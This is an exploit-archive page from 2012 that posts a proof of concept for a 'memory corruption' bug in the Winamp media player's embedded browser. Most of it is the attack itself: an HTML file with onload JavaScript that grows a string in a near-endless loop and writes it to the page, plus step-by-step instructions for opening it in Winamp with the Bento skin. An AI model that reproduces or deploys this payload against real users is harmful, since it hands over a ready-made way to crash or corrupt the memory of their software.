Winamp Browser Memory Corruption Vulnerability



EKU-ID: 2571 CVE: OSVDB-ID:
Author: X-Cisadane Published: 2012-08-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


=============================================== 
Winamp Browser Memory Corruption Vulnerability 
===============================================

:-----------------------------------------------------------------------------------------------------------------------: 
: # Exploit Title : Winamp Browser Memory Corruption Vulnerability 
: # Date : 13 Agustus 2012 
: # Author : X-Cisadane 
: # Software Link : http://www.winamp.com/media-player/all  
: # My Version : 5.63 
: # Version : ALL Versions 
: # Category : Desktop (Windows) Applications 
: # Platform : Win32 
: # Vulnerability : Memory Corruption Vulnerability 
: # Tested On : Microsoft Windows XP SP 3 En-Us 32 Bit 
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Winda Utari 
:-----------------------------------------------------------------------------------------------------------------------: 
Proof of Concept 
================ 
1. Copy this script into notepad/your favorite text editor : 
<body onload="javascript:kali_cisadane();"></body> 
<script>function kali_cisadane(){var X="\x5c\x78\x34\x32";for(i=0;i<999999999;i++){X+=X+"\x5c\x78\x34\x32";document.write(+X+X);}}</script> 

2. Save File Name as 0wn.html (For Example). 
3. Open Winamp with Bento Skin & Click Browser. Fill with your 0wn.html location In the URL Bar.\

PIC : http://i50.tinypic.com/ush0j.png